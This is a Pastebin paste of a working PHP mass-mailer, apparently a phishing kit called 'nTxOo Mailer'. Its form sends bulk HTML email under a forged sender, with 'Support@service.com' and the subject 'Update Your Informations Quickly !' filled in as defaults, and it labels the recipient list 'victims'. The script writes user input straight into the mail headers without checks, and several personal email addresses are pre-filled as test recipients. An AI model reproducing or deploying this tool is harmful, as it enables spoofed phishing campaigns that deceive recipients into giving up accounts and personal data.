Advertisement
xshroon

Untitled

Apr 17th, 2018
250
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.82 KB | None | 0 0
  1. <?php $testa = $_POST['veio']; if($testa != "") { $message = $_POST['html']; $subject = $_POST['assunto']; $nome = $_POST['nome']; $de = $_POST['de']; $to = $_POST['emails']; $headers = "MIME-Version: 1.0\r\n"; $headers .= "Content-type: text/html; charset=iso-8859-1\r\n"; $email = explode("\n", $to); $headers .= "From: ".$nome." <".$de.">\r\n"; $message = stripslashes($message); $i = 0; $count = 1; while($email[$i]) { $ok = "ok"; if(mail($email[$i], $subject, $message, $headers)) echo "* Number: $count <b>".$email[$i]."</b> <font color=greenSend Ok ;)</font><br><hr>"; else echo "* Number: $count <b>".$email[$i]."</b> <font color=red>Failure Send -_-</font><br><hr>"; $i++; $count++; } $count--; if($ok == "ok") echo "<script> alert('Send End . ".$count." e-mails '); </script>"; } ?>
  2. <html>
  3. <head>
  4. <title>nTxOo Mailer </title>
  5. <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
  6. <style> body { margin-left: 0; margin-right: 0; margin-top: 0; margin-bottom: 0; } .titulo { font-family: Arial, Helvetica, sans-serif; font-size: 18px; color: #000000; font-weight: bold; } .normal { font-family: Arial, Helvetica, sans-serif; font-size: 12px; color: #000000; } .form { font-family: Arial, Helvetica, sans-serif; font-size: 10px; color: #333333; background-color: #FFFFFF; border: 1px dashed #666666; } .texto { font-family: Verdana, Arial, Helvetica, sans-serif; font-weight: bold; } .alerta { font-family: Verdana, Arial, Helvetica, sans-serif; font-weight: bold; color: #990000; font-size: 10px; } </style>
  7. </head>
  8. <body>
  9. <center>
  10. <form action="" method="post" enctype="multipart/form-data" name="form1"> <input type="hidden" name="veio" value="sim">
  11. <table width="700" height="620" border="0" cellpadding="0" cellspacing="1" bgcolor="#CCCCCC" class="normal">
  12. <tr>
  13. <td width="462" height="25" align="center" bgcolor="#EB0707">
  14. <span class="titulo">Priv8 Script [nTxOo] :</span>
  15. </td>
  16. </tr>
  17. <tr>
  18. <td height="194" valign="top" bgcolor="#FFFFFF">
  19. <table width="100%" border="0" cellpadding="0" cellspacing="5" class="normal" height="444">
  20. <tr>
  21. <td align="right" height="25">
  22. <span class="texto">Name/Email From :</span>
  23. </td>
  24. <td width="74%" height="25">
  25. <input name="nome" type="text" class="form" id="nome" value="" style="width:48%" >
  26. <input name="de" type="text" class="form" id="de" value="Support@service.com" style="width:49%" >
  27. </td>
  28. </tr>
  29. <tr>
  30. <td align="right" height="17">
  31. <span class="texto">Subject :</span>
  32. </td>
  33. <td height="30">
  34. <input name="assunto" type="text" class="form" id="assunto" value="Update Your Informations Quickly !" style="width:100%" >
  35. </td>
  36. </tr>
  37. <tr align="center" bgcolor="#6F726F">
  38. <td height="20" colspan="2" bgcolor="#6F726F">
  39. <span class="texto">Letter ( HTML ):</span>
  40. </td>
  41. </tr>
  42. <tr align="right">
  43. <td height="146" colspan="2" valign="top">
  44. <br>
  45. <textarea name="html" style="width:100%" rows="8" wrap="greenSend VIRTUAL" class="form" id="html"></textarea>
  46. <span class="alerta">*Note: Text or HTML</span>
  47. </td>
  48. </tr>
  49. <tr align="center" bgcolor="#6F726F">
  50. <td height="47" colspan="2"><span class="greenSend texto">Enter the email address of victims below: ( MailList )</span>
  51. <p>
  52. <span class="texto">NOTE: E-mail over the other</span>
  53. </td>
  54. </tr>
  55. <tr align="right">
  56. <td height="136" colspan="2" valign="top"><br> <textarea name="emails" style="width:100%" rows="8" wrap="VIRTUAL" class="form" id="emails">ntx.winged@hotmail.com
  57. shadowntx@yahoo.com
  58. ntx.exe2014@gmail.com</textarea> <span class="alerta">*NOTE: Maybe Separated by line break</span> </td> </tr> <tr> <td height="26" align="right" valign="top" colspan="2"><input type="Submit" name="Submit" value="Begin"></td> </tr> </table> </td> </tr> <tr> <td height="15" align="center" bgcolor="#EB0707">&nbsp;</td> </tr> </table> </form> </center></body> <? exit(); ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement